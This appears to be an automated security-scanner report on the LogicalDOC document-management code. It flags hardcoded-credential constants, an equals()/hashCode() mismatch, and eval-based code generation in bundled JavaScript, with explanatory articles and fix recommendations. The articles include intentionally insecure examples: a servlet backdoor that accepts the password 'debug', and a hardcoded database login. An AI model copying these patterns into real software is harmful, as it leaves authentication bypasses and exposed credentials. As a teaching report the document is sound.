    31 public class SetPassword extends Window {
    32    private static final String NOTIFY = "notify";
    33
    34    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    35
    36    private static final String NEWPASSWORD = "newpassword";
    37
    38    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    39


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/security/SetPassword.java
Code:

    31 public class SetPassword extends Window {
    32    private static final String NOTIFY = "notify";
    33
    34    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    35
    36    private static final String NEWPASSWORD = "newpassword";
    37
    38    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    39
    40    public SetPassword(final long userId) {
    41        super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/tenant/SetAdminPassword.java
Code:

    25 * @author Marco Meschieri - Logical Objects
    26 * @since 6.9
    27 */
    28 public class SetAdminPassword extends Window {
    29
    30    private static final String NEWPASSWORD = "newpassword";
    31
    32    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    33
    34    private TenantServiceAsync service = (TenantServiceAsync) GWT.create(TenantService.class);
    35

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/tenant/SetAdminPassword.java
Code:

    27 */
    28 public class SetAdminPassword extends Window {
    29
    30    private static final String NEWPASSWORD = "newpassword";
    31
    32    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    33
    34    private TenantServiceAsync service = (TenantServiceAsync) GWT.create(TenantService.class);
    35
    36    public SetAdminPassword(final String tenantName) {
    37        super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/ChangePassword.java
Code:

    35 public class ChangePassword extends Window {
    36    private static final String PASSWORD = "password";
    37
    38    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    39
    40    private static final String NEWPASSWORD = "newpassword";
    41
    42    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    43
    44    public ChangePassword(final GUIUser user) {
    45        super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/ChangePassword.java
Code:

    33 * @since 6.0
    34 */
    35 public class ChangePassword extends Window {
    36    private static final String PASSWORD = "password";
    37
    38    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    39
    40    private static final String NEWPASSWORD = "newpassword";
    41
    42    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    43

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/ChangePassword.java
Code:

    31 * 
    32 * @author Marco Meschieri - Logical Objects
    33 * @since 6.0
    34 */
    35 public class ChangePassword extends Window {
    36    private static final String PASSWORD = "password";
    37
    38    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    39
    40    private static final String NEWPASSWORD = "newpassword";
    41

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/setup/client/Setup.java
Code:

    74
    75    private static final String DB_TYPE = "dbType";
    76
    77    private static final String DB_ENGINE = "dbEngine";
    78
    79    private static final String DB_PASSWORD = "dbPassword";
    80
    81    private static final String DB_USERNAME = "dbUsername";
    82
    83    private static final String DB_URL = "dbUrl";
    84

Using Hardcoded Credentials

There are two typical scenarios where a developer might use hardcoded credentials while working on an application:

• If the application has to connect to external services that require authorization, such as a DBMS or LDAP;

• If the application implements authentication and client authorization for access to non-public functions. The most common variant of this would be a remote diagnostics or debugging feature. This type of feature is classified by experts as a backdoor.

Regardless of the original purpose of the hardcoded credentials, their existence is a problem. In some cases, the malicious user can read them and use them for unauthorized access to application functions, or to external services connected to it.

Example 1

Let's take a look at an example, where access to critical operations is granted to users that passed a login/password check. In addition to that, access is also granted to the test user with the password "debug" for remote debugging purposes:

Java:
    @Override
    protected void doGet( HttpServletRequest req, HttpServletResponse resp )
            throws ServletException, IOException
    {
        String login = req.getParameter( "login" );
        String password = req.getParameter( "password" );

        if( authenticate( login, password ) || "debug".equals( password ) )
        {
            // request processing
        }
    }

The "debug" password is not tracked by the centralized authentication system, which means it is impossible to turn it off using administrative measures. Moreover, the administrator might not even know about it. In this case, the constant password is not only an external threat, but could also be used by the developers for nefarious purposes.

Example 2

Let's take a look at an example where a constant login/password pair is used when connecting to a database:

Java:
    ...
    DriverManager.getConnection(url, "login", "password");
    ...

If an outside user can get a look at the application source code, he will know the password, and he could gain access to the database. Changing the hardcoded password is only possible by updating the application. This means that in an event of a security breach, it would be impossible to close it quickly.

Note: The user does not need to have direct access to the source code, he could instead study the executable byte code using special tools.

Potential Consequences

The extent of potential problems depends on which authorization checks the given construction can bypass. In any case, using this method to bypass the standard control flow based on the username violates the overall security system, since it is not controlled by centralized methods.

Removal Recommendations

• We recommend against using hardcoded credentials;

• We recommend against using user account data to change information flow and bypass common authorization mechanisms. Any such bypass should be controlled by the system administrator, so that it can be closed after debugging the program;

• We recommend using common mechanisms to limit access to system resources, such as roles and user groups;

• Account data that the application uses to interact with external resources should be stored outside the code. For example, it can be stored in encrypted configuration files, protected storage, or a database unavailable from the outside. If encryption is not possible, ensure that access privileges to the file are properly set up;

• When creating new application user accounts, we recommend against using default values. Insist that the user change their password after the first login;

• When storing user accounts, we recommend using hash functions [1] in order to prevent access even if the storage is stolen. In this case, authentication compares the hashes rather than the passwords themselves. We also recommend using a randomly generated salt [2] for every password. This makes breaking in significantly more difficult.

Java: Violating the Java Object Model
Severity: low
Language: Java
Short description: If an object redefines the equals() method without redefining the hashCode() method, it violates the Java object model requirement that equivalent objects must have an equivalent hash.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/RestrictionObjectModelViolation.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/i18n/Language.java
Code:

 * Instances of this class represent a language supported by the LogicalDOC DMS
 * 
 * @author Alessandro Gasparini - Logical Objects
 * @since 3.0.3
 */
public class Language implements Comparable<Language> {

    protected static Logger log = LoggerFactory.getLogger(Language.class);

    private Locale locale;

    private Set<String> stopWords = new HashSet<String>();

    private Analyzer analyzer;

    private String analyzerClass;

    private SnowballProgram stemmer;

    public Language(Locale locale) {
        this.locale = locale;
        loadStopwords();
    }

    public Locale getLocale() {
        return locale;
    }

    public String getLanguage() {
        return locale.getLanguage();
    }

    public String getDisplayLanguage() {
        return locale.getDisplayLanguage();
    }

    public String getDefaultDisplayLanguage() {
        return locale.getDisplayLanguage(Locale.ENGLISH);
    }

    /**
     * Populates the field stopWords reading the resource
     * /stopwords/stopwords_<locale>.txt
     */
    void loadStopwords() {
        try {
            Set<String> swSet = new HashSet<String>();
            String stopwordsResource = "/stopwords/stopwords_" + getLocale().toString() + ".txt";
            log.debug("Loading stopwords from: " + stopwordsResource);
...

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/Client.java
Code:

 * A remote client connected to LogicalDOC
 * 
 * @author Marco Meschieri - LogicalDOC
 * @since 7.5
 */
public class Client {

    /**
     * An optional Identifier of the client, you must guarantee that this is
     * unique.
     */
    private String id;

    private String address;

    private String host;

    public Client() {
    }

    public Client(String address, String host) {
        this(null, address, host);
    }

    public Client(String id, String address, String host) {
        super();
        this.id = id;
        this.address = address;
        this.host = host;
    }

    public String getId() {
        return id;
    }

    public void setId(String id) {
        this.id = id;
    }

    public String getAddress() {
        return address;
    }

    public void setAddress(String address) {
        this.address = address;
    }

    public String getHost() {
        return host;
...

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/SoftwareVersion.java
Code:

 * Models a generic software version
 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.8.1
 */
public class SoftwareVersion implements Comparable<SoftwareVersion> {

    private String version;

    public final String get() {
        return this.version;
    }

    public SoftwareVersion(String version) {
        if (version == null)
            throw new IllegalArgumentException("Version can not be null");
        if (!version.matches("[0-9]+(\\.[0-9]+)*"))
            throw new IllegalArgumentException("Invalid version format");
        this.version = version;
    }

    @Override
    public int compareTo(SoftwareVersion that) {
        if (that == null)
            return 1;
        String[] thisParts = this.get().split("\\.");
        String[] thatParts = that.get().split("\\.");
        int length = Math.max(thisParts.length, thatParts.length);
        for (int i = 0; i < length; i++) {
            int thisPart = i < thisParts.length ? Integer.parseInt(thisParts[i]) : 0;
            int thatPart = i < thatParts.length ? Integer.parseInt(thatParts[i]) : 0;
            if (thisPart < thatPart)
                return -1;
            if (thisPart > thatPart)
                return 1;
        }
        return 0;
    }

    @Override
    public boolean equals(Object that) {
        if (this == that)
            return true;
        if (that == null)
            return false;
        if (this.getClass() != that.getClass())
            return false;
        return this.compareTo((SoftwareVersion) that) == 0;
    }
...

Violating the Java Object Model


If an object redefines the equals() method without redefining the hashCode() method, it violates the Java object model requirement that equivalent objects must have an equivalent hash.

Example

Let's take a look at an object of type Article:

Java
public class Article
{
    private final String name;

    public Article( String name )
    {
        this.name = name;
    }

    @Override
    public boolean equals(Object o)
    {
        if( this == o ) return true;
        if( !( o instanceof Article ) ) return false;
        return name.equals( ((Article)o).name );
    }
}

The Article class redefines the equals() method in such a way that articles are considered equal if they have equal names. The class does not redefine the hashCode() method. By default, every object inherits the hashCode() method from the base Object class, which uses the object's address in memory as its hash. This means that two objects of the Article class will have different hashes, even if they are equal.

Let's take a look at a collection of Article objects:

Java
public static void main(String[] args) {
    HashSet<Article> articles = new HashSet<Article> ();
    Article a1 = new Article("My Article");
    Article a2 = new Article("My Article");
    articles.add(a1);
    articles.add(a2);
}

The code in the example runs without error, since a1.hashCode() != a2.hashCode(): both objects end up in the set. The documentation of the add method states that only unique objects are added to the collection; in other words, an object e is added only if the collection contains no object e2 such that (e==null ? e2==null : e.equals(e2)). Our example therefore contradicts the definition of HashSet.

HashSet is not the only collection affected by this violation of the object model.

Potential Consequences

Breaking this requirement of equal hash codes for equal objects will lead to problems in dealing with collections, as well as errors in application logic. This is especially critical in dealing with hash tables and sets.

Removal Recommendations

The implemented class has to redefine both equals() and hashCode() in such a way that this requirement is fulfilled:

Java
o1.equals(o2) && (o1.hashCode() == o2.hashCode())

By default, the equals() method only returns true if the object is compared to itself, and hash codes are unique (as far as possible, of course) to each object.
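As an added illustration (not LogicalDOC's code), here is how a class with the equality semantics of the SoftwareVersion excerpt above can satisfy this requirement: because "1.0" and "1.0.0" compare equal, hashCode() must be computed from exactly the normalized data that equals() compares, not from the raw string. The names VersionKey and BrokenVersion are assumptions for this example; main() contrasts the fixed class with one that inherits hashCode() from Object, as in the finding.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

/**
 * Added illustration, not LogicalDOC code. The names VersionKey and
 * BrokenVersion are assumptions made for this example.
 *
 * Like the SoftwareVersion excerpt on this page, equals() treats "1.0"
 * and "1.0.0" as equal. hashCode() is derived from the same normalized
 * data, so equal versions always get equal hashes.
 */
public final class VersionKey {

    /** Numeric components with trailing zero components removed. */
    private final int[] parts;

    public VersionKey(String version) {
        if (version == null || !version.matches("[0-9]+(\\.[0-9]+)*"))
            throw new IllegalArgumentException("Invalid version format");
        String[] raw = version.split("\\.");
        int len = raw.length;
        // "1.0.0", "1.0" and "1" all normalize to [1]; both equals() and
        // hashCode() look only at this normalized array.
        while (len > 1 && Integer.parseInt(raw[len - 1]) == 0)
            len--;
        parts = new int[len];
        for (int i = 0; i < len; i++)
            parts[i] = Integer.parseInt(raw[i]);
    }

    @Override
    public boolean equals(Object o) {
        if (this == o)
            return true;
        if (!(o instanceof VersionKey))
            return false;
        return Arrays.equals(parts, ((VersionKey) o).parts);
    }

    /** Same normalized data as equals(): equal objects, equal hash. */
    @Override
    public int hashCode() {
        return Arrays.hashCode(parts);
    }

    /**
     * The defect reported on this page: equals() is overridden but
     * hashCode() is inherited from Object, so equal objects have
     * unrelated hashes.
     */
    static final class BrokenVersion {
        private final String version;

        BrokenVersion(String version) {
            this.version = version;
        }

        @Override
        public boolean equals(Object o) {
            if (!(o instanceof BrokenVersion))
                return false;
            return new VersionKey(version).equals(new VersionKey(((BrokenVersion) o).version));
        }
        // hashCode() deliberately not overridden
    }

    public static void main(String[] args) {
        Set<VersionKey> consistent = new HashSet<>();
        consistent.add(new VersionKey("1.0"));
        consistent.add(new VersionKey("1.0.0"));
        // Equal hashes: the second add() finds the first entry via equals()
        // and is rejected, so the set holds a single version.
        System.out.println("consistent hashCode, set size: " + consistent.size());

        Set<BrokenVersion> broken = new HashSet<>();
        broken.add(new BrokenVersion("1.0"));
        broken.add(new BrokenVersion("1.0.0"));
        // HashSet compares stored hashes before calling equals(); with two
        // different inherited hashes equals() is never consulted and both
        // "equal" objects are stored.
        System.out.println("inherited hashCode, set size: " + broken.size());

        Map<BrokenVersion, String> installed = new HashMap<>();
        installed.put(new BrokenVersion("7.5"), "installed");
        // Lookup by an equal but not identical key misses for the same reason.
        System.out.println("lookup by equal key: " + installed.get(new BrokenVersion("7.5.0")));
    }
}
```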

JavaScript: Incorrect User Input Filtration when Generating Code on the Fly
Severity: high
Language: JavaScript
Short description: This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions not accounted for by the developer.
Full description: https://localhost:443/scanner/article?articleName=/en/JavaScript/InjectionCode.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-gui/war/login/hosted.html
Code:

  for (var i = 0; i < argCount; i++) {
    argList += ",p" + i;
  }
  var argListNoComma = argList.substring(1);

  return eval(
    "__gwt_tearOffGenerators[" + argCount + "] =\n" +
    "  function(dispId) {\n" +
    "    return function(" + argListNoComma + ") {\n" +
    "      var result = __static(dispId, this" + argList + ");\n" +
    "      if (result[0]) {\n" +
    "        throw result[1];\n" +
    "      } else {\n" +
    "        return result[1];\n" +
    "      }\n" +
    "    }\n" +
    "  }\n"
  ); 
}

function __gwt_makeResult(isException, result) {
  return [isException, result];
}

File name: logicaldoc/logicaldoc-gui/war/login/hosted.html
Code:

  for (var i = 0; i < argCount; i++) {
    argList += ",p" + i;
  }
  var argListNoComma = argList.substring(1);

  return eval(
    "__gwt_javaInvokes[" + argCount + "] =\n" +
    "  function(thisObj, dispId" + argList + ") {\n" +
    "    var result = __static(dispId, thisObj" + argList + ");\n" +
    "    if (result[0]) {\n" +
    "      throw result[1];\n" +
    "    } else {\n" +
    "      return result[1];\n" +
    "    }\n" +
    "  }\n"
  ); 
}

/*
 * This is used to create tear-offs of Java methods.  Each function corresponds
 * to exactly one dispId, and also embeds the argument count.  We get the "this"

File name: logicaldoc/logicaldoc-gui/war/login/login.nocache.js
Code:



File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:



File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.jsCode:

1958if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1959var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1960_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1961_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1962_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1963this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",[_2]);return 
_2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1964if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1965var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.

$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1966isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1967if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1968if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

232if(isc.Canvas&&isc.isA.Canvas(_2)){this.logWarn("Default value for property '"+_1+"' is set to a live Canvas (with ID '"+_2.getID()+"') at the Class or AutoChild-defaults level. SmartClient cannot clone a live widget, so each instance of this class may end up pointing to the same live component. To avoid unpredictable behavior and suppress this warning, use the AutoChild subsystem to set up re-usable default properties for sub-components.");return _2}233var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)234{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}235return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}236if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)237else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)238else _7=eval(_1)}}239if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}240return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. 
Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))241{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}242if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

233var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)234{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}235return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}236if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)237else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)

238else _7=eval(_1)}}239if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}240return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))241{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}242if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}243return _15.call(_13,_14,_6)};this.$105i=function(_13,_14,_15){var j;var _12=false;if(_15==null)_15=isc.Class.$105j;if(!_15){_13=String(_13);_2.lastIndex=0;if(_2.test(_13)){_13=_13.replace(_2,function(_16){return'\\u'+('0000'+_16.charCodeAt(0).toString(16)).slice(-4)})}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

1919this.sockets=[];this.socket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.receiveChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.socket);if(this.discoverableOnChannel){this.discoverySocket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.discoverableOnChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.discoverySocket)}1920var _2=this;var _3=0;for(var i=0;i<this.sockets.length;i++){var _5=this.sockets[i];_5.bind(function(){if(++_3==_2.sockets.length){_2.isAvailable=true;if(_1)_2.fireCallback(_1)}})}},stop:function(_1){this.isAvailable=false;if(!this.sockets){this.fireCallback(_1);return}1921var _2=this;var _3=this.sockets.length;for(var i=0;this.sockets&&i<this.sockets.length;i++){var _5=this.sockets[i];_5.close(function(){if(--_3==0){delete _2.sockets;if(_1)_2.fireCallback(_1)}})}},discover:function(_1){this.logDebug("discover invoked - callback: "+(_1?_1.toString():"null"));if(_1)this.fireCallback(_1,"serverProperties",[this.getServerProperties()])},ping:function(_1){this.logDebug("ping");if(_1)this.fireCallback(_1)},connect:function(_1){this.logDebug("connect");if(_1)this.fireCallback(_1)},disconnect:function(_1){this.logDebug("disconnect");if(_1)this.fireCallback(_1)},call:function(_1,_2,_3){var _4=this;var _5;var _6={};if(isc.isAn.Object(_1)){_6=_1;_5=_6.targetName;_1=_6.methodName;_2=_6.args;_3=_6.callback}1922if(!_5){var _7=_1.lastIndexOf(".");if(_7!=-1){_5=_1.substring(0,_7);_1=_1.substring(_7+1)}}1923if(_5&&!this.allowUnrestrictedCallTarget){this.logError("Attempt to call: "+_5+"."+_1+"() REJECTED - to enable, set allowUnrestrictedCallTarget on your "+this.getClassName());return}1924var 
_8=_5?eval(_5):this;if(!(this.visibleMethods.contains("*")||this.allowUnrestrictedCallTarget)){if(!(this.visibleMethods.contains(_1)||isc.MessagingDMI.builtinMethods.contains(_1))){this.logError("Attempt to call non-visible method: "+_1+" DENIED. To allow this action, declare this method in your "+this.getClassName()+".visibleMethods list.");return}}1925var _9=_8[_1];if(!_9){this.logError("Unable to find method named '"+_1+"' on class: "+this.getClassName());return}1926if(!_2)_2=[];if(!isc.isAn.Array(_2)){this.logError("Expected Array as second arg or props.args in "+this.getClassName()+".call(), but got:"+isc.echoFull(_2));return}1927if(_8==this){_9.apply(this,_2.concat([function(_10){if(_3)_4.fireCallback(_3,"retVal",[_10])}]))}else{var _10=_9.apply(_8,_2);if(_3)_4.fireCallback(_3,"retVal",[_10])}}});isc.defineClass("DebugTarget","MessagingDMIServer");isc.A=isc.DebugTarget.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.allowUnrestrictedCallTarget=true;isc.A.discoverableOnChannel="isc_DebugTarget";isc.A.socketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.discoverySocketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.$f8="count";isc.A.DEFAULT_CATEGORIES=[{name:"layout",description:"Logs from Layout and Stack about members and layout policy."},{name:"sizing",description:"Reporting drawn sizes"},{name:"scrolling",description:"Detecting the need for scrolling and custom scrollbars"},{name:"animation",description:"Animation logs"},{name:"RPCManager",description:"RPC and DataSource requests and responses"},{name:"RPCManagerResponse",description:"Enable logging of full length RPC responses (can be slow)"},{name:"xmlComm",description:"Inbound and outbound XML messages"},

{name:"xmlSelect",description:"XPath expressions and their results"},{name:"xmlBinding",description:"DataSource and WebService XML request/response handling"},{name:"xmlToJS",description:"XML to JavaScript translation in databinding"},{name:"ResultSet",description:"Load on demand and cache update management for ListGrids"},{name:"ResultTree",description:"Load on demand for TreeGrids"},{name:"FileLoader",description:"Background download and caching of files"},{name:"fetchTrace",description:"Shows a stack trace for all fetches initiated through a ResultSet"},{name:"dragDrop",description:"Drag and drop related logs"},{name:"EventHandler",description:"Mouse and keyboard events, bubbling, cancellation"},{name:"visualState",description:"Visual state transitions for buttons, bars, and other stateful widgets"},{name:"RpcTabTiming",description:"Show detailed timing data for RPC/DSRequests in the RPC tab"},{name:"gridEdit",description:"Inline editing in grids"},{name:"Page",description:"Page-wide events"},{name:"loadTime",description:"ISC load / parse time"},{name:"redraws",description:"Logging of redraw()s and reasons for them"},{name:"redrawTrace",description:"Logs a stack trace for every redraw when both 'redraws' and 'redrawTrace' are set to debug priority"},{name:"clears",description:"Logs all clear()s"},{name:"destroys",description:"Logs all destroy()s"},{name:"draws",description:"All component draws"},{name:"resize",description:"Resizes of drawn components"},{name:"testReplay",description:"Details of why Selenium commands are failing during playback"},{name:"DynamicForm"},{name:"ListGrid"},{name:"TreeGrid"},{name:"CubeGrid"},{name:"deprecated",description:"Notify when deprecated attributes are used"}];isc.B.push(isc.A.getGUID=function isc_DebugTarget_getGUID(_1){if(!this.GUID){var _2=isc.LogViewer.getGlobalLogCookieValue("isc_pageGUID");var 